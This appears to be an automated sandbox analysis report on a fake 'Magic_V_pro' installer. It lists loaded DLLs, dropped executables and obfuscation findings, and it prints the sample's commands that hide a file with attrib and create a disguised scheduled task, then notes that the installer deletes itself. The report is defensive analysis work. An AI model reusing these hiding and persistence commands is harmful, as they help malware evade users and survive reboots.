Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Reads the Windows registered owner settings

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Executable creates window controls seldom found in malware

Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Window found: window name: TMainForm

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

PE / OLE file has a valid certificate

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static file information: File size 3548416 > 1048576

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: taskshostw.exe, 00000012.00000002.3150093681.0000000004030000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: taskshostw.exe, 00000012.00000002.3150093681.0000000004030000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1339202842.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.8.dr, idp.dll.6.dr

Data Obfuscation

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00E28180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

11_2_00E28180

PE file contains sections with non-standard names

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Static PE information: section name: .didata
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	Static PE information: section name: .didata
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.7.dr	Static PE information: section name: .didata
Source: idp.exe.8.dr	Static PE information: section name: .sxdata
Source: willrandom.exe.11.dr	Static PE information: section name: pb

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 8_3_00933F91 push esi; ret	8_3_00933F93
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 8_2_008A0370 push eax; ret	8_2_008A0371
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 8_2_008A50B1 push esi; ret	8_2_008A50CB
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 8_2_00933F91 push esi; ret	8_2_00933F93
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E450F0 push eax; ret	11_2_00E4510E
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E45470 push eax; ret	11_2_00E4549E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0044D1FA push ebp; iretd	18_2_0044D291
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0044C9AE push edx; ret	18_2_0044C9AF
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00445EE0 push eax; mov dword ptr [esp], 2E29287Bh	18_2_00445EE1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0044D6FC pushad ; iretd	18_2_0044D6FD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0044D700 push ebp; iretd	18_2_0044D701
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0044D708 pushad ; iretd	18_2_0044D709
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB52DD push word ptr [esp]; mov dword ptr [esp], edx	18_2_03FB58BF
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB1A83 push dword ptr [esp+40h]; retn 0044h	18_2_03FB1A78
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB1A49 push dword ptr [esp+40h]; retn 0044h	18_2_03FB1A78
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB3203 push ss; iretd	18_2_03FB320F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB697A pushfd ; mov dword ptr [esp], eax	18_2_03FB68C2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB3975 push word ptr [esp+01h]; mov dword ptr [esp], esp	18_2_03FB3988
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB58C9 push word ptr [esp]; mov dword ptr [esp], edx	18_2_03FB58BF
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB58C6 push word ptr [esp]; mov dword ptr [esp], edx	18_2_03FB58BF
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB68BD pushfd ; mov dword ptr [esp], eax	18_2_03FB68C2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB788D push ecx; ret	18_2_03FB78A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB1038 push ebp; mov dword ptr [esp], edx	18_2_03FB101C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB6779 push word ptr [esp+01h]; mov dword ptr [esp], ebp	18_2_03FB6728
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB15C5 push dword ptr [esp+04h]; retn 0008h	18_2_03FB15D8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB5D8C push dword ptr [esp+30h]; retn 0034h	18_2_03FB5E2D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB5D6C push dword ptr [esp+30h]; retn 0034h	18_2_03FB5E2D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB5D3F push dword ptr [esp+30h]; retn 0034h	18_2_03FB5E2D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB14B6 push dword ptr [esp+0Ch]; retn 0010h	18_2_03FB14BA
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB145E push dword ptr [esp+0Ch]; retn 0010h	18_2_03FB14BA
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB1C35 push dword ptr [esp+20h]; retn 0024h	18_2_03FB1C27

Source: willrandom.exe.11.dr

Static PE information: section name: CODE entropy: 7.216381671022325

Persistence and Installation Behavior

Uses attrib.exe to hide files

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"

Drops PE files

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	File created: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-7UHOC.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	File created: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-7UHOC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	File created: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	File created: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\_isetup\_setup64.tmp	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\SysWOW64\cmd.exe

File deleted: c:\users\user\desktop\magic_v_pro_setup_stable_latest_release_version_9_709.exe

Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
